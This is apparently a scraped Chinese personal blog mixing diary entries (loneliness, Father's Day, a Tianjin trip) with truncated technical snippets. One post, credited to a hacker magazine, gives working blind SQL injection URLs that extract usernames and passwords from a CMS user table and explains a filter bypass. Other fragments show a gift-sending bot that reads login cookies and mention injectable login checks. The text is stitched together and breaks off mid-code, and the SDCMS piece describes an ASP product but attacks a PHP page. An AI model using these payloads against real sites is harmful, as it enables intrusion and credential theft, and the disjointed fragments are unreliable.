昨天的天一直灰灰的，
跟朋友聊天，
说啥时候结婚呀，
我说至少得5,6年吧，
现在属三无青年。
她说她比我早。
于是想到一个问题，
你喜欢的人的婚礼，你会参加么？

晚上就开始下雨了，
本来不想吃东西，
实在忍不住了。
于是进食，大果粒，一份炒面，一份紫菜汤，N多果冻，一个sqm，剩了四个圈面包留着今早吃了。

其实我以前只在心情不好的时候暴食，
昨天只是意外，
可是，心情却也真得没好到哪里去。

忽然有点漂，
没有朋友，
没有目的，
就象脱离母体的蒲公英。

我会回去么？
也许，
也不一定。
。。。。。。。。。。。。。。。。。。。。。。。。。。

1. <?php
2.         //注意，每天每个人，只允许发送一个普通礼物。
3.         ini_set('max_execution_time',0);
4.         $name = '*******'; //换成自己用户名
5.         $password = '*******';//换成自己的密码
6.         $cookie = get_cookie($name,$password);
7.         //$cookie='***' 如果上面的方法得不到cookie的内容的话，在浏览器中写javascript:document.write(document.cookie);来得到这个cookie值。
8.         $friends = get_friend_list();
9.         foreach ($friends as $uid) {
10.                 send_gift($uid);
11.         }
12.         function get_cookie($name,$password) {
13.                 $ch = curl_init();
14.  

冬至饺子夏至面

今天吃面呀！

－－－－－－－－－－－－－－

刚开msn,看林博发的消息，

一起抵制新浪BLOG，

其实新浪BLOG上记东西确实挺麻烦的，字数有限制，

有时候你非得把一篇分成两篇来记。还得对字增删琢磨，

不过，林博最根本的理由，是和谐

届此，向林博学习，提高觉悟呀。

记起一句经典的话来：你到底是为党说话，还是为人民说话。

额，现在貌似成矛盾的双方了。

不好不好，要和谐。

－－－－－－－－－－－－－－

今天还是另外一个日子，

祝天下所有的父亲身体健康。

我会好好地活着。

在玩一个游戏的时候，遇到将“52 61 72 21 1A 07 00 EA 86 73 80 00 0D 00 00 00 7C 00 00 00 00 82 CD”类似这种字节码放到一个文件里去。本以为ue可以完成，发现对ue的使用不够熟习，遂用ＰＨＰ代码来完成（其实，hexworkshop这个软件也可以完成，但懒得安装了，就随手写了段代码。）

如下：

$str = '52 61 72 21 1A 07 00 EA 86 73 80 00 0D 00 00 00 7C 00 00 00 00 82 CD 1B D3 27 B4 06 53 D0 5F 92 E3 EB 6C 15 BD 96 8D 4A 7A 9E 9D C8 13 A8 DE 5B D5 18 F2 AF 1C F6 F3 5B CC 35 E9 81 14 83 BC 13 3E 97 B3 3D 55 BC A5 FC 0F 67 37 53 40 9E A5 3B 73 DF 2D 5E 67 CE A4 6B 6D D7 9C 64 BC 19 96 A8 7E BA 5B 0C 74 D3 FC 20 1D AA B5 45 2C BC 74 3C 69 3C 51 D8 28 21 38 4E 40 15 32 EE 98 D1 DF 06 A6 21 0E C6 35 AA A3 C2 C1 8C AC 64 02 E9 AA 28 F1 5F 5F B7 25 C0 50 80 8F 86 69 3F 6A 74 F4 37 AB 12 4C CD 32 25 95 71 3B 5A E4 EF 70 BC C6 79 8D FE D5 A4 48 0E FE BE 1D 98 8F 4C A8 B8 7F 9A AE 6D 4C CD 2A 79 42 B8 B0 64 41 45 DE F9 B5 6F AC 91 78 03 05 44 52 CF 86 62 0A 5E 5D 34 FA 6F 78 6A FF 56 D8 60 8C 0B 82 23

昨晚一点多回来，

静静的躺床上，

忽然觉得屋里好寂静，

越寂静，我越张大耳朵，

想寻觅一丝动静，

然后就失眠了。

 

本文已发《黑客防线》第六期(转载请注明)

SDCMS全称：时代网站信息管理系统。SDCMS是基于ASP+ACCESS/MSSQL的网站信息管理系统。永久免费，开源！ SDCMS以信息为主题，通过以文字和图片标题为起点，以无限栏目分类为支撑，配合多项插件的灵活使用，以达到信息门户的远景！

SDCMS总结各类信息门户的现状，充分考虑符合站长需求的前提下。设计了灵活多变的标签调用方式，满足了不同层次的需求。

SDCMS以安全第一为原则，解决了ASP程序的常见漏洞问题（服务器自身的问题除外）。程序自身无任何后门，严格的代码过滤功能为网站的安全运行提供了可靠的保障。

 

  

构造如下url :
http://localhost/index.php?album-show-key-test%27or%20(select%20ascii(mid(name,1,1))%20from%20mp_user)%3E48%20and%20%271%27like%271.html
http://localhost:8080/index.php?album-show-key-test%27or%20(select%20ascii(mid(pwd,1,1))%20from%20mp_user)%3E48%20and%20%271%27like%271.html
即可根据返回的结果判断出用户名和密码来...


另：这里补充下其源代码，为什么能绕过GPC呢。
在/core/~runtime.php中有如下代码，
class app extends base {
        ......
        $query = substr(getquery(), 1);
        C('url

今天暴了一个金山网盾的安全问题。

其原因是程序处理HTML的时候，对用户恶意构造的JS处理不当所导至的。

 

众观现在的一些桌面应用产品，有一部分已经基本采用HTML来做界面，这样，在程序启用的时候，开启一个web服务，其界面便可以交互了。

这样，其优缺点也暴露出来了。

优点当然是开发比较方便了，并且可以做到很美观。

 

但大部分开发者只在做web站点时考虑相关安全，而在做桌面应用的时候，便忽略它了。

 

其间还有一个例子， 一个股票分析软件，其验证用户名和密码，采用网络验证。

发送一个类似url.asp?username=***&pass=***的请求，而在server端那里，估计作者考虑，这个在应用程序中封装着呢， 所以对其特殊字符等东西也没有过滤，直接可以注入。

 

其它类似产品这种问题，也应该有吧。

 

额。

在浮燥的社会，心也跟着乱了起来．

想让自己静静的，

处世不惊

于是我花一下午的时间，

动也不动地坐在电脑前，

打开某人的博客，

静静的听着，

博客里那首，天空之城的旋律．

天变有黑了，快下雨了．

就这样静静的．

象我看南京那天

让自己的心变成一滩死水，

不必关心太多，

换一种心情，

换一种方式．

也许，眼中的世界就不一样．

 

五一的时候去了踏天津．

跟同学一起，同行８人．

上午去了古文化街，比较2，打车出去，又走回来，又走到文化街．那开车的司机也急着赚钱，说，你们下去吧，这路赌的．我们就下来了．车真是多，没办法．

和另一车的人们在玻璃桥上汇合了．玻璃桥貌似很有名，百度一下才知道，０５年修起来的，跟我差正好十岁．

对这桥没有什么恋恋不舍的，于是头也不回的下了桥，直往古文化街．

古文化街，第一感觉真古，第二感觉，装古．

也就那样，一些遗少年留下来的建筑物，翻新后，改成了商店．成了人们赚钱的法码．卖的东西真多，各种艺术品，与泰山遍地的石头店不同，这些好多泥人店，有张泥人，有泥人张，也有张果松，记不清了，真真假假，假假真真，不禁感叹，山寨真多．但这何尝又不是人生的缩影呢．

然后去的是食品街，呵，其实就是一个大的集贸市场，里面好多大排档似的小吃．当然少不了狗不理和麻十八．狗包子吃了一个，感觉跟家里吃速冻饺子差不多，猪肉在我眼里和嘴里都一样．也没啥吃的，地方脏，看着都没味口，就差点进麦当劳了，最后还是进去了，不过，是去买冰檄淋．．．：）

接着打车去坐轻轨，准备去塘沽